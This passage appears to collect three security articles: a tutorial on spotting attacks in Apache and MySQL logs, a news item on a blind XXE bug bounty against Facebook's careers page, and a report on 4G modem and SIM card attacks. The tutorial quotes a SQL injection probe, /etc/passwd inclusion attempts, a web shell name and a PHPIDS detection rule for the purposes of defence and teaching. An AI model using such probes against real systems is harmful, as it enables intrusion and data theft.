server. We also need to analyze the logs for proper results. In the next section, we will see how we can analyze the Apache server’s access logs to figure out if there are any attacks being attempted on the website. Analyzing the logs Manual inspection In cases of logs with a smaller size, or if we are looking for a specific keyword, then we can spend some time observing the logs manually using things like grep expressions. In the following figure, we are trying to search for all the requests that have the keyword “union” in the URL. From the figure above, we can see the query “union select 1,2,3,4,5” in the URL. It is obvious that someone with the IP address 192.168.56.105 has attempted SQL Injection. Similarly, we can search for specific requests when we have the keywords with us. In the following figure, we are searching for requests that try to read “/etc/passwd”, which is obviously a Local File Inclusion attempt. If we clearly observe, there is a file named “b374k.php” being accessed. “b374k” is a popular web shell and hence this file is purely suspicious. Looking at the response code “200?, this line is an indicator that someone has uploaded a web shell and is accessing it from the web server. It doesn’t always need to be the scenario that the web shell being uploaded is given its original name when uploading it onto the server. In many cases, attackers rename them to avoid suspicion. This is where we have to act smart and see if the files being accessed are regular files or if they are looking unusual. We can go further ahead and also see file types and the time stamps if anything looks suspicious. One single quote for the win It is a known fact that SQL Injection is one of the most common vulnerabilities in web applications. Most of the people who get started with web application security start their learning with SQL Injection. Identifying a traditional SQL Injection is as easy as appending a single quote to the URL parameter and breaking the query. Anything that we pass can be logged in the server, and it is possible to trace back. The following screenshot shows the access log entry where a single quote is passed to check for SQL Injection in the parameter “user”. %27 is URL encoded form of a Single Quote. For administration purposes, we can also perform query monitoring to see which queries are executed on the database. If we observe the above figure, it shows the query being executed from the request made in the previous figure, where we are passing a single quote through the parameter “user”. We will discuss more about logging in databases later in this article. Analysis with automated tools When there are huge amount of logs, it is difficult to perform manual inspection. In such scenarios we can go for automated tools along with some manual inspection. Though there are many effective commercial tools, I am introducing a free tool known as Scalp. According to their official link, “Scalp is a log analyzer for the Apache web server that aims to look for security problems. The main idea is to look through huge log files and extract the possible attacks that have been sent through HTTP/GET.” Scalp can be downloaded from the following link. https://code.google.com/p/apache-scalp/ It is a Python script, so it requires Python to be installed on our machine. The following figure shows help for the usage of this tool. As we can see in the figure, we need to feed the log file to be analyzed using the flag “–l”. Along with that, we need to provide a filter file using the flag “-f” with which Scalp identifies the possible attacks in the access.log file. We can use a filter from the PHPIDS project to detect any malicious attempts. This file is named as default_filter.xml and can be downloaded from the link below. https://github.com/PHPIDS/PHPIDS/blob/master/lib/IDS/default_filter.xml The following piece of code is a part that is taken from the above link. <filter> <id>12</id> <rule><![CDATA[(?:etc/W*passwd)]]></rule> <description>Detects etc/passwd inclusion attempts</description> <tags> <tag>dt</tag> <tag>id</tag> <tag>lfi</tag> </tags> <impact>5</impact> </filter> It is using rule sets defined in XML tags to detect various attacks being attempted. The above code snippet is an example to detect a File Inclusion attempt. Similarly, it detects other types of attacks. After downloading this file, place it in the same folder where Scalp is placed. Run the following command to analyze the logs with Scalp. python scalp-0.4.py –l /var/log/apache2/access.log –f filter.xml –o output –html Note: I have renamed this file in my system to access.log.1 in the screenshot. You can ignore it. ‘output’ is the directory where the report will be saved. It will automatically be created by Scalp if it doesn’t exist. –html is used to generate a report in HTML format. As we can see in the above figure, Scalp results show that it has analyzed 4001 lines over 4024 and found 296 attack patterns. We can even save the lines that are not analyzed for some reason using the “–except” flag. A report is generated in the output directory after running the above command. We can open it in a browser and look at the results. The following screenshot shows a small part of the output that shows directory traversal attack attempts. Logging in MySQL This section deals with analysis of attacks on databases and possible ways to monitor them. The first step is to see what are the set variables. We can do it using “show variables;” as shown below. The following figure shows the output for the above command. As we can see in the above figure, logging is turned on. By default this value is OFF. Another important entry here is “log_output”, which is saying that we are writing them to a “FILE”. Alternatively, we can use a table also. We can even see “log_slow_queries” is ON. Again, the default value is “OFF”. All these options are explained in detail and can be read directly from MySQL documentation provided in the link below. MySQL :: MySQL 5.0 Reference Manual :: 5.2 MySQL Server Logs Query monitoring in MySQL The general query log logs established client connections and statements received from clients. As mentioned earlier, by default these are not enabled since they reduce performance. We can enable them right from the MySQL terminal or we can edit the MySQL configuration file as shown below. I am using VIM editor to open “my.cnf” file which is located under the “/etc/mysql/” directory. If we scroll down, we can see a Logging and Replication section where we can enable logging. These logs are being written to a file called mysql.log file. We can also see the warning that this log type is a performance killer. Usually administrators use this feature for troubleshooting purposes. We can also see the entry “log_slow_queries” to log queries that take a long duration. Now every thing is set. If someone hits the database with a malicious query, we can observe that in these logs as shown below. The above figure shows a query hitting the database named “webservice” and trying for authentication bypass using SQL Injection. More logging By default, Apache logs only GET requests. To log POST data, we can use an Apache module called “mod_dumpio”. To know more about the implementation part, please refer to the link below. mod_dumpio - Apache HTTP Server Version 2.2 Alternatively, we can use ‘mod security’ to achieve the same result. Reference Log Files - Apache HTTP Server Version 2.2 Source

A vulnerability was discovered and patched in a third-party service that handles resumes on Facebook’s careers page. The discovery was worth more than $6,000 in a bounty paid out by Facebook to researcher Mohamed Ramadan of Egypt, who published some details of the vulnerability and exploit on his website. Ramadan said the vulnerability is a blind XXE (XML External Entity) Out of Band bug. It allowed him to upload a .docx file to the careers page with some additional code that was not vetted by the third-party service. The careers page accepts resumes only in PDF or .docx formats. Ramadan said he was able to use the 7zip program to extract the XML contents of the .docx file he’d created. He opened a file called [Content_Types].xml and inserted benign code that he uploaded to the page. The code, he said, connected to his python HTTP server 15 minutes later. Ramadan said that while his attack code was innocuous, a hacker could carry out any number of malicious activities, including a denial-of-service attack on the parsing system, carrying out TCP scans using HTTP external entities, gain unauthorized access to data stored as XML files, carry out denial-of-service attacks on other systems, read system and application files, execute more code, or use connected applications for DDoS attacks. Since the third-party service, however, was not part of Facebook’s production environment, user data or Facebook source code would not be at risk. This is not the first time Ramadan has been rewarded with a Facebook bounty. In October 2013, he found vulnerabilities in the Facebook Messenger apps for Android that enable any other app on a device to access the user’s Facebook access token and take over her account, and a similar flaw in the Facebook Pages Manager for Android, an app that allows admins to manage multiple Facebook accounts. That bug also enables other apps to grab a user’s access token. Facebook has tackled XXE bugs before. In January, it paid out a $33,500 bounty to a Brazilian researcher who found a XXE vulnerability in Facebook’s Forgot Your Password service. He reported the XXE bug and asked Facebook for permission to escalate it to a remote code execution flaw. Facebook quickly patched, but Silva shared his potential exploit with the Facebook security team which decided it merited a major bounty. Source

Researchers say 4G USB modems contain exploitable vulnerabilities through which attackers could, and researchers have, managed to gain full control of the machines to which the devices are connected. Researchers from Positive Technologies presented a briefing detailing how to compromise USB modems and attack SIM cards via SMS over 4G networks at the PacSec and Chaos Computer Club conferences in Tokyo and Hamburg respectively over the last month. In addition to allowing for full machine access, the 4G modem attack also yielded access to subscriber accounts on relevant carrier portals. By sending a binary SMS, the researchers managed to lock SIM cards and sniff and decrypt device traffic. The research was carried out by a Positive Technologies team consisting of Sergey Gordeychik, Alexander Zaitsev, Kirill Nesterov, Alexey Osipov, Timur Yunusov, Dmitry Sklyarov, Gleb Gritsai, Dmitry Kurbatov, Sergey Puzankov and Pavel Novikov. Of the six USB modems with 30 separate firmware installations tested, the researchers found that just three firmware varieties were resistant to their attacks. They managed to find publicly available telnet access credentials via Google, but they needed http access in order to monitor communications. After connecting their USB modems to their machines and listing the devices as distinct nodes with web applications, the researchers were able to launch browser-based cross-site request forgery, cross-site scripting and remote code execution attacks. Through these attacks, researchers obtained information regarding international mobile subscriber identities, universal integrated circuit cards, international mobile station equipment identities and software versions, device names, firmware versions, WI-Fi statuses and more (see image on right). In addition to information, the researchers compelled the modems to change DNS settings in order to sniff traffic, change SMS center settings in order to intercept and interfere with SMS messaging, change passwords on self-service portals, lock modems by deliberately entering wrong PIN or PUK codes, and remotely update modem firmware to vulnerable versions. The researchers noted in a blogpost that the impact of their attack methods is not limited to consumers using affected smartphones. Any number of critical infrastructure installations, including industrial control systems (ICS) and supervisory control and data acquisition (SCADA) machines use mobile communication technology based largely or at least in part on the GSM standard. Certain ATMs also deploy these USB modem technologies to remotely transmit payment data. Their SIM attack was slightly less effective, having only managed to exploit some 20 percent of the 100 SIM cards they tested. In fact, these attacks were more or less a matter of whether or not the researchers could brute-force the data encryption standard (DES) keys protecting the SIMs. 3DES keys take substantially longer to break. “To brute-force DES keys, we use a set of field-programmable gate arrays (FPGA), which became trendy for Bitcoin mining a couple of years ago and got cheaper after the hype was over,” the researchers wrote. “The speed of our 8 modules *ZTEX 1.15y board with the price tag of 2,000 Euro is 245.760 Mcrypt/sec. It is enough to obtain the key within 3 days.” That was their fastest brute-force. If they had a partially known 3DES key, they could break it in 10 days. Deploying standard processing power, like the Intel CPU (Core i7-2600k), would take roughly five years to break DES and more than 20 years to break 3DES. Once DES or 3DES is broken, researchers said they could issue commands to toolkit applications (TAR). One such TAR was a file system storing Temporary Mobile Subscriber Identity and Ciphering Keys. This access gave researcher the ability to decrypt subscriber traffic without using brute force attacks on DES, spoof a subscriber’s identity in order to receive her calls and texts, track a subscriber’s location and cause a denial of service entering three wrong PIN codes and 10 wrong PUK codes in a row if PIN code is enabled for file system protection. Source